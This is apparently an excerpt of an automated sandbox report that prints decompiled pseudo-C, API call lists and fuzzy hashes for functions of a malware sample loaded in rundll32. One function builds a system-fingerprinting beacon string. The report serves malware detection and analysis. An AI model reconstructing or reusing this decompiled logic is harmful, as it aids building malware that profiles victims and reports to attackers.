                                          0x047b7bf9
                                          0x047b7c00
                                          0x047b7c05
                                          0x047b7c07
                                          0x047b7c07
                                          0x047b7c0c
                                          0x047b7c0c
                                          0x047b7bf4
                                          0x047b7c20

                                          APIs
                                            • Part of subcall function 047B642C: SysFreeString.OLEAUT32(?), ref: 047B650B
                                            • Part of subcall function 047B4CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,047B358E,004F0053,00000000,?), ref: 047B4CDC
                                            • Part of subcall function 047B4CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,047B358E,004F0053,00000000,?), ref: 047B4D06
                                            • Part of subcall function 047B4CD3: memset.NTDLL ref: 047B4D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B7C0C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: 21073a80185a1b30a8abfd8bae3866dc17084a3d2115ed9196a74734ac531ef9
                                          • Instruction ID: e8ad7242c4140cda523fcae07a7a9eab314fa0399b8479fe02931f950cf005eb
                                          • Opcode Fuzzy Hash: 21073a80185a1b30a8abfd8bae3866dc17084a3d2115ed9196a74734ac531ef9
                                          • Instruction Fuzzy Hash: B201BC3250051ABFDB169FA8CD04FEBBBBCEB44610F004429EA45E7221E371EA56CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B9347, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E047B9347(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x47bd330;
				E047B684E();
				while(1) {
					_t8 = E047B32BA(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E047BA5E9(_t14);
					if(_t15 == 0) {
						HeapFree( *0x47bd238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E047B684E();
					if(_t19 != 0) {
						_t22 =  *0x47bd338; // 0x6cb9b58
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                          0x047b934f
                                          0x047b9353
                                          0x047b9354
                                          0x047b9355
                                          0x047b935a
                                          0x047b935f
                                          0x047b9366
                                          0x047b936d
                                          0x00000000
                                          0x00000000
                                          0x047b936f
                                          0x047b9374
                                          0x047b9375
                                          0x047b937c
                                          0x047b9396
                                          0x00000000
                                          0x047b937e
                                          0x047b937e
                                          0x047b9380
                                          0x047b9383
                                          0x047b9387
                                          0x00000000
                                          0x00000000
                                          0x047b9389
                                          0x047b9387
                                          0x047b939e
                                          0x047b939e
                                          0x047b93a0
                                          0x047b93a7
                                          0x047b93a9
                                          0x047b93af
                                          0x047b93b6
                                          0x047b93c6
                                          0x047b93be
                                          0x047b93c1
                                          0x047b93c1
                                          0x047b93c9
                                          0x047b93c9
                                          0x047b93d2
                                          0x047b93d2
                                          0x047b939c
                                          0x00000000

                                          APIs
                                            • Part of subcall function 047B684E: GetProcAddress.KERNEL32(36776F57,047B935F), ref: 047B6869
                                            • Part of subcall function 047B32BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 047B32E5
                                            • Part of subcall function 047B32BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 047B3307
                                            • Part of subcall function 047B32BA: memset.NTDLL ref: 047B3321
                                            • Part of subcall function 047B32BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 047B335F
                                            • Part of subcall function 047B32BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 047B3373
                                            • Part of subcall function 047B32BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 047B338A
                                            • Part of subcall function 047B32BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 047B3396
                                            • Part of subcall function 047B32BA: lstrcat.KERNEL32(?,642E2A5C), ref: 047B33D7
                                            • Part of subcall function 047B32BA: FindFirstFileA.KERNEL32(?,?), ref: 047B33ED
                                            • Part of subcall function 047BA5E9: lstrlen.KERNEL32(?,00000000,047BD330,00000001,047B937A,047BD00C,047BD00C,00000000,00000005,00000000,00000000,?,?,?,047B207E,?), ref: 047BA5F2
                                            • Part of subcall function 047BA5E9: mbstowcs.NTDLL ref: 047BA619
                                            • Part of subcall function 047BA5E9: memset.NTDLL ref: 047BA62B
                                          • HeapFree.KERNEL32(00000000,047BD00C,047BD00C,047BD00C,00000000,00000005,00000000,00000000,?,?,?,047B207E,?,047BD00C,?,?), ref: 047B9396
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: 3217b3d08aa7c0172f2780b524ef466e401e61e3152374cb11704adcb8e048c5
                                          • Instruction ID: bc24cfaef6b3572d8f94a8d2854d4c9f5c186eea17cdf2f582b4f39e72f155cb
                                          • Opcode Fuzzy Hash: 3217b3d08aa7c0172f2780b524ef466e401e61e3152374cb11704adcb8e048c5
                                          • Instruction Fuzzy Hash: B501F5F1200305AEF7105EA6CD84BEABBA9EB44364B140035FBD5C72A0D6A4BD8153E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B1B13, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E047B1B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E047B7BA9(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E047B74B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0x47bd238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}







                                          0x047b1b1b
                                          0x047b1b72
                                          0x047b1b77
                                          0x047b1b1d
                                          0x047b1b37
                                          0x047b1b3b
                                          0x047b1b40
                                          0x047b1b42
                                          0x047b1b54
                                          0x047b1b60
                                          0x047b1b44
                                          0x047b1b44
                                          0x047b1b49
                                          0x047b1b4e
                                          0x047b1b4e
                                          0x047b1b42
                                          0x047b1b3b
                                          0x047b1b7d

                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,047B690C,?,004F0053,06CB9388,00000000,?), ref: 047B1B60
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: d62a42bad1f7b72fd8dac0abb220ff3eba27a3e85c3d3bbf297f9b2d1148c355
                                          • Instruction ID: 39f587bc9ce85a683655f26dbd3bd0c7307735a65cd7674e02d38036430718b0
                                          • Opcode Fuzzy Hash: d62a42bad1f7b72fd8dac0abb220ff3eba27a3e85c3d3bbf297f9b2d1148c355
                                          • Instruction Fuzzy Hash: 2A016232100209FBDB229F95DC15FEB7B69EF443A0F448419FA599A260E730A920DBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 047B514F, Relevance: 34.7, APIs: 23, Instructions: 204memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E047B514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t34;
				intOrPtr _t35;
				int _t38;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr* _t57;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				int _t84;
				intOrPtr _t86;
				int _t89;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				void* _t103;
				int _t104;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t111;

				_t98 = __edx;
				_t94 = __ecx;
				_t26 = __eax;
				_t108 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t26 = GetTickCount();
				}
				_t27 =  *0x47bd018; // 0x3df0b315
				asm("bswap eax");
				_t28 =  *0x47bd014; // 0x3a87c8cd
				asm("bswap eax");
				_t29 =  *0x47bd010; // 0xd8d2f808
				asm("bswap eax");
				_t30 =  *0x47bd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t31 =  *0x47bd2a4; // 0x24fa5a8
				_t3 = _t31 + 0x47be633; // 0x74666f73
				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x47bd02c,  *0x47bd004, _t26);
				_t34 = E047B57AB();
				_t35 =  *0x47bd2a4; // 0x24fa5a8
				_t4 = _t35 + 0x47be673; // 0x74707526
				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
				_t111 = _t109 + 0x38;
				_t105 = _t104 + _t38;
				_t99 = E047B73E9(_t94);
				if(_t99 != 0) {
					_t86 =  *0x47bd2a4; // 0x24fa5a8
					_t6 = _t86 + 0x47be8cb; // 0x736e6426
					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t89;
					HeapFree( *0x47bd238, 0, _t99);
				}
				_t100 = E047B614A();
				if(_t100 != 0) {
					_t81 =  *0x47bd2a4; // 0x24fa5a8
					_t8 = _t81 + 0x47be8d3; // 0x6f687726
					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t84;
					HeapFree( *0x47bd238, 0, _t100);
				}
				_t101 =  *0x47bd324; // 0x6cb95b0
				_a32 = E047B757B(0x47bd00a, _t101 + 4);
				_t43 =  *0x47bd2cc; // 0x0
				if(_t43 != 0) {
					_t77 =  *0x47bd2a4; // 0x24fa5a8
					_t11 = _t77 + 0x47be8ad; // 0x3d736f26
					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t80;
				}
				_t44 =  *0x47bd2c8; // 0x0
				if(_t44 != 0) {
					_t74 =  *0x47bd2a4; // 0x24fa5a8
					_t13 = _t74 + 0x47be8a6; // 0x3d706926
					wsprintfA(_t105 + _t108, _t13, _t44);
				}
				if(_a32 != 0) {
					_t103 = RtlAllocateHeap( *0x47bd238, 0, 0x800);
					if(_t103 != 0) {
						E047B749F(GetTickCount());
						_t51 =  *0x47bd324; // 0x6cb95b0
						__imp__(_t51 + 0x40);
						asm("lock xadd [eax], ecx");
						_t55 =  *0x47bd324; // 0x6cb95b0
						__imp__(_t55 + 0x40);
						_t57 =  *0x47bd324; // 0x6cb95b0
						_t106 = E047B4D2C(1, _t98, _t108,  *_t57);
						asm("lock xadd [eax], ecx");
						if(_t106 != 0) {
							StrTrimA(_t106, 0x47bc294);
							_t63 =  *0x47bd2a4; // 0x24fa5a8
							_push(_t106);
							_t15 = _t63 + 0x47be252; // 0x616d692f
							_t65 = E047B9DEF(_t15);
							_v20 = _t65;
							if(_t65 != 0) {
								_t92 = __imp__;
								 *_t92(_t106, _v4);
								 *_t92(_t103, _v0);
								_t93 = __imp__;
								 *_t93(_t103, _v32);
								 *_t93(_t103, _t106);
								_t71 = E047B666E(0xffffffffffffffff, _t103, _v32, _v28);
								_v56 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E047B6106();
								}
								HeapFree( *0x47bd238, 0, _v48);
							}
							HeapFree( *0x47bd238, 0, _t106);
						}
						HeapFree( *0x47bd238, 0, _t103);
					}
					HeapFree( *0x47bd238, 0, _a24);
				}
				HeapFree( *0x47bd238, 0, _t108);
				return _a12;
			}

















































                                          0x047b514f
                                          0x047b514f
                                          0x047b514f
                                          0x047b5154
                                          0x047b515a
                                          0x047b5164
                                          0x047b5166
                                          0x047b5166
                                          0x047b5173
                                          0x047b517e
                                          0x047b5181
                                          0x047b518c
                                          0x047b518f
                                          0x047b5194
                                          0x047b5197
                                          0x047b519c
                                          0x047b519f
                                          0x047b51ab
                                          0x047b51b8
                                          0x047b51ba
                                          0x047b51c0
                                          0x047b51c5
                                          0x047b51d0
                                          0x047b51d2
                                          0x047b51d5
                                          0x047b51dc
                                          0x047b51e0
                                          0x047b51e2
                                          0x047b51e7
                                          0x047b51f3
                                          0x047b51f5
                                          0x047b5201
                                          0x047b5203
                                          0x047b5203
                                          0x047b520e
                                          0x047b5212
                                          0x047b5214
                                          0x047b5219
                                          0x047b5225
                                          0x047b5227
                                          0x047b5233
                                          0x047b5235
                                          0x047b5235
                                          0x047b523b
                                          0x047b524e
                                          0x047b5252
                                          0x047b5259
                                          0x047b525c
                                          0x047b5261
                                          0x047b526c
                                          0x047b526e
                                          0x047b5271
                                          0x047b5271
                                          0x047b5273
                                          0x047b527a
                                          0x047b527d
                                          0x047b5282
                                          0x047b528c
                                          0x047b528e
                                          0x047b5296
                                          0x047b52af
                                          0x047b52b3
                                          0x047b52bf
                                          0x047b52c4
                                          0x047b52cd
                                          0x047b52de
                                          0x047b52e2
                                          0x047b52eb
                                          0x047b52f1
                                          0x047b52fe
                                          0x047b530b
                                          0x047b5311
                                          0x047b531d
                                          0x047b5323
                                          0x047b5328
                                          0x047b5329
                                          0x047b5330
                                          0x047b5335
                                          0x047b533b
                                          0x047b5341
                                          0x047b5348
                                          0x047b534f
                                          0x047b5355
                                          0x047b535c
                                          0x047b5360
                                          0x047b536b
                                          0x047b5370
                                          0x047b5376
                                          0x047b537f
                                          0x047b537f
                                          0x047b5390
                                          0x047b5390
                                          0x047b539f
                                          0x047b539f
                                          0x047b53ae
                                          0x047b53ae
                                          0x047b53c0
                                          0x047b53c0
                                          0x047b53cf
                                          0x047b53e0

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 047B5166
                                          • wsprintfA.USER32 ref: 047B51B3
                                          • wsprintfA.USER32 ref: 047B51D0
                                          • wsprintfA.USER32 ref: 047B51F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047B5203
                                          • wsprintfA.USER32 ref: 047B5225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047B5235
                                          • wsprintfA.USER32 ref: 047B526C
                                          • wsprintfA.USER32 ref: 047B528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047B52A9
                                          • GetTickCount.KERNEL32 ref: 047B52B9
                                          • RtlEnterCriticalSection.NTDLL(06CB9570), ref: 047B52CD
                                          • RtlLeaveCriticalSection.NTDLL(06CB9570), ref: 047B52EB
                                            • Part of subcall function 047B4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,047B52FE,?,06CB95B0), ref: 047B4D57
                                            • Part of subcall function 047B4D2C: lstrlen.KERNEL32(?,?,?,047B52FE,?,06CB95B0), ref: 047B4D5F
                                            • Part of subcall function 047B4D2C: strcpy.NTDLL ref: 047B4D76
                                            • Part of subcall function 047B4D2C: lstrcat.KERNEL32(00000000,?), ref: 047B4D81
                                            • Part of subcall function 047B4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,047B52FE,?,06CB95B0), ref: 047B4D9E
                                          • StrTrimA.SHLWAPI(00000000,047BC294,?,06CB95B0), ref: 047B531D
                                            • Part of subcall function 047B9DEF: lstrlen.KERNEL32(?,00000000,00000000,047B5335,616D692F,00000000), ref: 047B9DFB
                                            • Part of subcall function 047B9DEF: lstrlen.KERNEL32(?), ref: 047B9E03
                                            • Part of subcall function 047B9DEF: lstrcpy.KERNEL32(00000000,?), ref: 047B9E1A
                                            • Part of subcall function 047B9DEF: lstrcat.KERNEL32(00000000,?), ref: 047B9E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 047B5348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047B534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 047B535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 047B5360
                                            • Part of subcall function 047B666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 047B6720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 047B5390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 047B539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,06CB95B0), ref: 047B53AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047B53C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 047B53CF
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: defe69b17af04b33355b14251b2b26f93cae65015e869f984fe6433b6c64cddf
                                          • Instruction ID: f0763d5ea03fb37758bd8fe41748cf4813ca7a401e3614b18d26d9a63bb9725e
                                          • Opcode Fuzzy Hash: defe69b17af04b33355b14251b2b26f93cae65015e869f984fe6433b6c64cddf
                                          • Instruction Fuzzy Hash: B3619D71500605AFE721ABA4ED48FD677E8EB48318F058528F948DB350E73CED069BE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047BADA5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E047BADA5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x47b0000;
				_t115 = _t139[3] + 0x47b0000;
				_t131 = _t139[4] + 0x47b0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x47b0000;
				_v16 = _t139[5] + 0x47b0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x47b0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x47bd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x47bd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x47bd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x47bd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x47bd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x47bd198; // 0x0
										 *_t102 = _t125;
										 *0x47bd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x47bd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                          0x047badb4
                                          0x047badca
                                          0x047badd0
                                          0x047badd2
                                          0x047badd7
                                          0x047baddd
                                          0x047bade2
                                          0x047bade5
                                          0x047badf3
                                          0x047badfa
                                          0x047badfd
                                          0x047bae00
                                          0x047bae01
                                          0x047bae04
                                          0x047bae07
                                          0x047bae0a
                                          0x047bae0f
                                          0x047bae1e
                                          0x00000000
                                          0x047bae24
                                          0x047bae2e
                                          0x047bae38
                                          0x047bae3d
                                          0x047bae3f
                                          0x047bae49
                                          0x047bae4c
                                          0x047bae4f
                                          0x047bae55
                                          0x047bae57
                                          0x047bae57
                                          0x047bae5a
                                          0x047bae5d
                                          0x047bae62
                                          0x047bae66
                                          0x047bae79
                                          0x047bae7b
                                          0x047baf23
                                          0x047baf23
                                          0x047baf2a
                                          0x047baf2d
                                          0x047baf37
                                          0x047baf37
                                          0x047baf3b
                                          0x047bafb9
                                          0x047bafbc
                                          0x047bafbe
                                          0x047bafbe
                                          0x047bafc5
                                          0x047bafc7
                                          0x047bafd1
                                          0x047bafd4
                                          0x047bafd7
                                          0x047bafd7
                                          0x00000000
                                          0x047baf3d
                                          0x047baf40
                                          0x047baf6e
                                          0x047baf78
                                          0x047baf7c
                                          0x047baf84
                                          0x047baf87
                                          0x047baf8e
                                          0x047baf98
                                          0x047baf98
                                          0x047baf9c
                                          0x047bafa1
                                          0x047bafb0
                                          0x047bafb6
                                          0x047bafb6
                                          0x047baf9c
                                          0x00000000
                                          0x047baf47
                                          0x047baf4a
                                          0x047baf52
                                          0x047baf67
                                          0x047baf6c
                                          0x00000000
                                          0x00000000
                                          0x047baf6c
                                          0x00000000
                                          0x047baf52
                                          0x047baf40
                                          0x047baf3b
                                          0x047bae81
                                          0x047bae88
                                          0x047bae98
                                          0x047baea1
                                          0x047baea5
                                          0x047baee8
                                          0x047baef4
                                          0x047baf1d
                                          0x047baef6
                                          0x047baefa
                                          0x047baf00
                                          0x047baf08
                                          0x047baf0a
                                          0x047baf0d
                                          0x047baf13
                                          0x047baf15
                                          0x047baf15
                                          0x047baf08
                                          0x047baefa
                                          0x00000000
                                          0x047baef4
                                          0x047baead
                                          0x047baeb0
                                          0x047baeb7
                                          0x047baec7
                                          0x047baeca
                                          0x047baeda
                                          0x00000000
                                          0x047baee0
                                          0x047baec1
                                          0x047baec5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047baec5
                                          0x047bae92
                                          0x047bae96
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047bae96
                                          0x047bae6f
                                          0x047bae73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 047BAE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 047BAE9B
                                          • GetLastError.KERNEL32 ref: 047BAEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 047BAEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: abcc120fee22777a8114dce329556db8a94ac4d2821282a95a57cd330d19c380
                                          • Instruction ID: 07b74ef3b6b0803b6382a93fb4356a8b0bd7fbe0e128858d835e7bca1e995951
                                          • Opcode Fuzzy Hash: abcc120fee22777a8114dce329556db8a94ac4d2821282a95a57cd330d19c380
                                          • Instruction Fuzzy Hash: A18128B1A00709AFDB21DFA9D885BEEB7F5EB48310F118029E945E7340EB74E905CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B30FC, Relevance: 15.1, APIs: 10, Instructions: 102stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E047B30FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
